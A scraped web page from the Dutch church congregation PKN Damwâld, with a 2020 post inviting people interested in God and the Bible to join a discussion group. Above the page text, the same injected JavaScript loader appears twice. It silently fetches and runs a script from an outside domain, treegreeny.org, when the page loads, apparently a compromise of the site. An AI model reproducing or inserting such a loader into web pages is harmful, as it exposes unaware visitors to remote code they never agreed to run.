;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Geloof je, of ben je op zoek naar God? - PKN Damwâld

Geloof je, of ben je op zoek naar God?

Gepubliceerd op: maandag 26 oktober 2020

Dit is een soort opsporingsbericht. We zijn op zoek naar mensen die weleens nadenken over God, maar er toch soms te weinig aan toe komen. We zijn op zoek naar mensen die ontdekt hebben dat het geloof in hun leven belangrijk is, en er van binnen voor hebben gekozen met God te leven. En we zijn op zoek naar mensen die er eerst meer van willen weten, en het interessant vinden er met anderen over te praten.
Elk jaar probeer ik daar een groepje van te maken, omdat het voor mij een mooie opdracht is mensen te helpen meer van God te ontdekken, of om te leren hoe ze met hun geloof vruchtbaar kunnen zijn in hun omgeving en in de kerk. Het kan uitlopen op een echt jawoord tegenover God (dan doe je belijdenis), maar daar moet je klaar voor zijn. De ontmoetingen die we hebben zijn vaak op zich al heel waardevol.
Dit is een opsporingsbericht: zijn er mensen die er belangstelling voor hebben om meer te weten te komen over God en de Bijbel en het geloof? Daar wil ik dan graag iets voor organiseren. Nu is het op dit moment niet te voorspellen wat er mogelijk zal zijn nu we volop weer te maken hebben met de beperkingen door de weer oplaaiende Covid-19. Maar daar moet samen iets op te bedenken zijn.
In elk geval: als je iets herkent in dit opsporingsbericht, geef je dan vrijwillig aan door contact met me te zoeken (tel. 424842, e-mail Klik hier ) Helaas heb ik geen ‘meldhetanoniem-nummer’, al zijn tips altijd welkom.